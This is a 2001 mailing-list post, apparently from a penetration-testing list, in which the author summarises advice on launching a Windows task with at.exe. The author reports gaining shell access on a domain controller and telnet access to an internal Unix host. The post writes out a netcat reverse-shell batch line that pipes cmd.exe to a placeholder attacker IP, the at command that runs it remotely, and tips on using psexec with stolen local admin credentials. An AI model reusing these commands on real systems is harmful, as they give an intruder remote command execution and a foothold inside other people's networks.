summary of : problems to start a task with at.exe

From: otanerat_private
Date: Thu Nov 15 2001 - 08:25:25 PST

  • Next message: Dawes, Rogan (ZA - Johannesburg): "RE: problems to start a task with at.exe"

    Hello together,
    First of all, I got a lot of input from you guys, thanks for that.
    I have now shell access on the domain controller and with some tricks
    and brain work also telnet access on the main unix-system in their 
    internal network. I think, that's a good finding :-)
    I want to give all of you a short summary of all the hints. If you
    are not interested, send this mail directly to /dev/null. Anyway,
    maybe some of you will find this helpful and here it comes:
    the content of my batch file was:
    c:\nc.exe IP_attacker port1_attacker | cmd.exe | nc.exe IP_attacker
    the command:
    at \\target time "c:\test.bat"
    Tipp 1.) use the absolute path in the batch
    - I'm stupied, but this was, in my case, the right solution. I typed the
      and that worked fine:
      c:\nc.exe IP_attacker port1_attacker | cmd.exe | c:\nc.exe IP_attacker
      I forgot the c:\ in front of the second nc.exe. It is not necessary to use
    the absolute path for the cmd.exe, but for the nc.exe.
    Tipp 2.) don't use the quotes in the command
    - Well, I tried both, with and without quotes - same result
    Tipp 3.) use /interactive
    - same as above
    Tipp 4.) use the tool psexec
    - This tool is realy cool. If you can upload tools to a compromised system
    in the DMZ and 
      you are able to execute it - this tool can solve a lot of your problems
    :-) But you need
      the username and the password (local admin).
    Thanks again for all your input.
    GMX - Die Kommunikationsplattform im Internet.
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